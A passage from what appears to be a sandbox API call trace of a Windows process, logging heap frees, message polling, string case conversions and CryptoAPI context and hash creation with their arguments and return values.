lpsz="A1A0070620F") returned 0xb [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0089.627] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0089.627] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0089.627] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0089.627] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.628] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0089.628] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.628] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.628] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.628] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0089.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0089.629] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0089.629] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0089.629] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0089.629] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0089.629] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0089.629] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.629] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.629] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.629] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0089.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0089.630] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.630] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0089.630] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0089.630] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0089.630] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0089.630] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0089.630] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0089.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fa0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0089.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0089.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fe0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0089.630] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9961a8) returned 1 [0089.631] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.631] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.631] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0089.631] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.631] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0089.631] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.631] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.631] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.631] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.631] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.631] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.631] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0089.632] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.632] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0089.632] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.632] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.632] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.632] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.632] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.632] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.632] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.632] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0089.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.632] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0089.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.632] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0089.632] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.632] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0089.632] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.632] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.633] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0089.633] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0089.633] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0089.633] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0089.633] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0089.633] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.633] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.633] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0089.633] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0089.633] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0089.633] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0089.633] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0089.633] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0089.633] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.633] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.633] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.633] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0089.633] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.633] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0089.633] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.633] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.633] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0089.633] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.633] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0089.634] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.634] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.634] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0089.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9cb8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0089.634] CryptCreateHash (in: hProv=0x9961a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0089.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0089.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0089.634] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0089.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0089.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0089.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.634] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0089.634] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.634] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0089.634] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.634] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, 